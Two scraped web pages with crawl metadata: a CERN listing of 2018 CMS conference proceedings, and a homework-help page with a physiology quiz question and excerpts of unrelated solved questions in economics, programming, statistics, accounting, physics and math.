Particle Flow and PUPPI in the Level-1 trigger at CMS for the HL-LHC / Kreis, Benjamin Jonah (Fermilab) /CMS Collaboration With the planned addition of tracking information to the Compact Muon Solenoid (CMS) Level-1 trigger for the High-Luminosity Large Hadron Collider (HL-LHC), the trigger algorithms can be completely reconceptualized. We explore the feasibility of using Particle Flow-like reconstruction and pileup per particle identification (PUPPI) pileup mitigation at the hardware trigger level. [...] CMS-CR-2018-096.- Geneva : CERN, 2018 - 7 p. Fulltext: PDF; In : 4th International Workshop Connecting The Dots 2018, Seattle, Washington, 20 - 22 Mar 2018
2018-07-13
09:13
State and Prospects of BSM Searches at the LHC / Spiezia, Aniello (Beijing, Inst. High Energy Phys.) /ATLAS and CMS Collaborations In the last years, the ATLAS and CMS experiments at LHC have recorded more than 100 fb$^{-1}$ of data that are used to investigate with high precision many aspects of high energy physics. In this conference proceeding, I will review the most recent and interesting results related to the search of new physics at the ATLAS and CMS experiments.. CMS-CR-2018-069.- Geneva : CERN, 2018 - 11 p. Fulltext: PDF; In : an Alpine LHC Physics Summit, Obergurgl, Austria, 15 - 20 Apr 2018
2018-07-13
09:12
Forward and Low-x Physics in the CMS Experiment / Sunar Cerci, Deniz (Cukurova U.) /CMS Collaboration Forward physics measurements with the Compact Muon Solenoid (CMS) experiment, one of the two large multi-purpose experiments at the Large Hadron Collider (LHC) at CERN, cover a wide range of physics subjects. HF and CASTOR, the forward calorimeters of the CMS, are used to collect the data up to pseudo-rapidity of 6.6. [...] CMS-CR-2018-064.- Geneva : CERN, 2018 - 5 p. Fulltext: PDF; In : 2nd Iran-Turkey joint conference on LHC physics, Tehran, Iran, 23 - 26 Oct 2017
|
2018-07-23 06:01:00
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8984740376472473, "perplexity": 5437.260947185973}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676594954.59/warc/CC-MAIN-20180723051723-20180723071723-00112.warc.gz"}
|
https://www.techwhiff.com/learn/question-15-2-points-which-of-the-following/331915
|
Question 15 (2 points) Which of the following matches the effects of the autonomic nervous system...
Question:
Question 15 (2 points) Which of the following matches the effects of the autonomic nervous system subdivisions on ion channels in effector cells when controlling heart rate? C 1) parasympathetic nervous system opens calcium channels 2) parasympathetic nervous system opens potassium channels 3) sympathetic nervous system opens chloride channels Save Question 16 (2 points) Acetylcholine binds to nicotinic receptors which causes this ion channel to open. How is this channel gated? 1) voltage 2) antagonistically 3) mechanically tarted 4) 名 F 4 0
Similar Solved Questions
Monopolistic competition differs from perfect competition primarily because in monopolistic competition, entry into the industry is...
Monopolistic competition differs from perfect competition primarily because in monopolistic competition, entry into the industry is blocked. in monopolistic competition, there are relatively few barriers to entry. in monopolistic competition, firms can differentiate their products. in perfect compet...
C Question: Write a function p3 which receives a C string as a parameter, and an...
C Question: Write a function p3 which receives a C string as a parameter, and an array of integers which will serve as indices into the string. The third parameter is the length of the integer array. The function jumbles the characters in the string according to the indices in the array of numbers. ...
Condition Condition Present Absent Row Total Test Result + 110 130 Test Result - 20 50...
Condition Condition Present Absent Row Total Test Result + 110 130 Test Result - 20 50 70 Column Total 130 200 Assume the sample is representative of the entire population. For a person selected at random, compute the following probabilities: (a) P(+ condition present); this is known as the sensitiv...
1. The plans of management are expressed formally in: A. the annual report to shareholders. B....
1. The plans of management are expressed formally in: A. the annual report to shareholders. B. Form 10-Q submitted to the Securities and Exchange Commission. C. performance reports. D. budgets. 2. Which of the following statements is correct? A. Managerial accounting is focused on precision. B. Mana...
2. A 0.060 kg tennis ball, moving with a speed of 5.28 m/s, has a head-on...
2. A 0.060 kg tennis ball, moving with a speed of 5.28 m/s, has a head-on collision with a 0.080 kg ball initially moving in the same direction at a speed of 3.00 m/s. Assume that the collision is perfectly elastic. Determine the velocity (speed and direction) of both the balls after the collision....
1) Allow f(x) = x3, and g(x) = 2x. Determine f(g(1)). 2) Enter the formula for...
1) Allow f(x) = x3, and g(x) = 2x. Determine f(g(1)). 2) Enter the formula for a sine function with an amplitude of 5, a period of 90 degrees, a shift of 45 degrees to the right and 3 units upwards. Determine the exact value of the expression sin (v) + cos (v) given that tan (v) = 7/3. 3) Solve the ...
Warnerwoods Company uses a perpetual inventory system. It entered into the following purchases and sales transactions...
Warnerwoods Company uses a perpetual inventory system. It entered into the following purchases and sales transactions for March Units sold at Retail Date Activities Mar. 1 Beginning inventory Mar 5 Purchase Mar. 9 Sales Mar. 18 Purchase Mar. 25 Purchase Mar. 29 Sales Totals Units Acquired at Cost 24...
Find the angle formed when [3, 4] and [−5, 12] are placed tail-to-tail, then find components for the vector projection that results when [3, 4] is projected onto [−5, 12]
Find the angle formed when [3, 4] and [−5, 12] are placed tail-to-tail, then find components for the vector projection that results when [3, 4] is projected onto [−5, 12]...
Why does electronegativity increases across a period?
Why does electronegativity increases across a period?...
Demand Curve & Consumer Surplus. Assume the $Price for Puppies is$200. 1. What is the...
Demand Curve & Consumer Surplus. Assume the $Price for Puppies is$200. 1. What is the buyer’s optimal (best) quantity demanded, Qd? 2. What Area shows buyer’s net gain or ‘Consumer Surplus’? 3. What Area shows buyer’s Total Dollar Value (Total Willingness to Pay)?...
|
2023-03-31 09:04:21
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3786105811595917, "perplexity": 3067.5176192145905}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949598.87/warc/CC-MAIN-20230331082653-20230331112653-00491.warc.gz"}
|